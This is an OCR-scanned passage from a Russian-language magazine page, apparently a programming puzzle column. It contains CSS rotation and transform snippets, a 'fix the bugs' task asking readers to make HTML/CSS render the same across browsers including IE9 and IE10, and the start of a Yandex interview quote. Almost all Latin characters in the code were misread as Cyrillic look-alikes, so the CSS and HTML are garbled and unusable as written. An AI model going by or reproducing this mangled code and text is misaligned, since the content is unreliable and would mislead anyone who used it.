-иеЬкіІ-Ігапз^оптк гоіаіе (_-45сіе§)і 

- тог-ѣгапа -Рогт: го~Ьа1:е(-45сІе е) : 

-тз-ІгапБРюгпк го!а1:е( -45сіе е) I 

- 0 - 1 : гап з-Рогт : го1:а1:е( -45сІе§) ; 

Ігапз-Рогт: го^а^еС -45бее ) ; 

= меЬкі*-1:гап5-Рогт^огіёіп : 0 100%; 

-то2г1:гагі5І : огтіогі§ігк_ 0 100%; 

-та-^гапз'Рорт-орі^іп : 0 100%; 

-о-ІігапБ-Ропт-огібіпі 0 100%^ 

Ігапз^огт-огіёіп : 0 100%; 

1 

Способ 2: 

. ресЕапеІе { 

Ьаск ярои псі: #2 3 В7Е4; 

ыісІ1: Іі : І ѲѲрх; 

МеіёІі1:_^1Ѳ0рх; 



. гесі:апё1е;Ье1 : оге л ._гесРап 2 Іе:а-Н:ег { 

сопіепі : ' ' ; 

місНіікѲ; 

Иеі ^Іт Ь:Ѳ; 

розіііоп :аЬзо1и1:е; 

1 



. гесЕапеІе : Ье -Р оге { 

Ьогсіег-Ьоііот: 50рх боіісі #23В7Е4; 

ЬогсІег-Іе-РІ : 50рх зоіісі #-р-р-р; 
ЬогсІеГ:_гі§1і1: : 50рх зоіісі Ц-р-р-р; 

> _ 

. ресЕапеІе : а-Ріег { 

ЬогсІег^1:ор_:50рх зоііб #23В7Е4; 

ЬогсІег-ІеРІ : 50рх зоіісі Цр-р-р; 

ЬопсІег-Ріе Ы: : 5 Ѳ рх 5о 1іс І Цр-р-р; 

таг§іп^50рх 0 0 0; 

> 

5. ИСПРАВЬ БАГИ 

УСЛОВИЕ 

Исправьте имеющийся код, чтобы получить ре- 
зультат на картинке. Полученный код должен ра- 
ботать в последних версиях браузеров СНготе, 
Рігеіох, Заіагі, Орега, а также ІЕ9, ІЕЮ. 

Что в приведенном коде является неправиль- 
ным и почему? Удалось ли вам получить идентич- 
ный результат во всех браузерах? 

Данная задача была протестирована в брау- 
зерах ІЕ9, ІЕЮ, ѴѴіпсІошз Заіагі 5.1 .7, Орега 12.15, 
Рігеіох 20.0.1, Сбготе 26.0.1410.64. 



Рис. 2. Результат выпол- 
'■'> Ш'л нения кода из задачи про 

исправление багов 






Исходный код: 
< І00СТУРЕ М:т1> 



<И1=т1> 

<1пеаб> 

<1:і1:1е>5оте 1:11:1 е </ 1 : ііііе > 

стеііа НІІ^едиіѵ^'СопІеп^-Туре" «-■ 

соп1 :еп1: ="1:ех1/И1:т 1 ; сіі а гз е 1= и~Е-Р-8" /> 



<5І:у1е 1ур е="1е х'Ь/с 5 5 "> 
Ьосіу { 

раеШ пд: ІѲѲрх: 

Ь_ 



.еіетепі { 

иісШп : 200рх; 

беіёіпі: :100рх; 

Ьаск|»гаипсІ.:_ 1іпеаг^гасІіеп1«н 

(•Ео Ьо« от. #269а е2 0 % . ^ 

#83сее2 1Ѳ0%^ 



ИІІег: р гоеі сі : ОХІта^еТгапз-Рогт^ 
МісгозоРІ ■ёгасІіеп'Ье 

(5ІагЬСо1ог5Іг='#269ае2 І , <-і 

епсіСо1оГ5І:г= 1 #83сее2 1 , 

Сгабіеп1:Туре=0 ); 



соіог :#-рр-р_; 

Іехі-аііеп : сеггЬег ; 

Ііпе -Ие і^І тЬ: ІѲѲрх; 

■Роп1:18рх Сеог^іа* зеггР; 



Яндекс: «Если ты придешь к нам на собеседование, то 
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юсят про различные сетевые технологии, про устройство 
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про опыт к одинга на скриптовых языках, про веб-серверы и базы ді 
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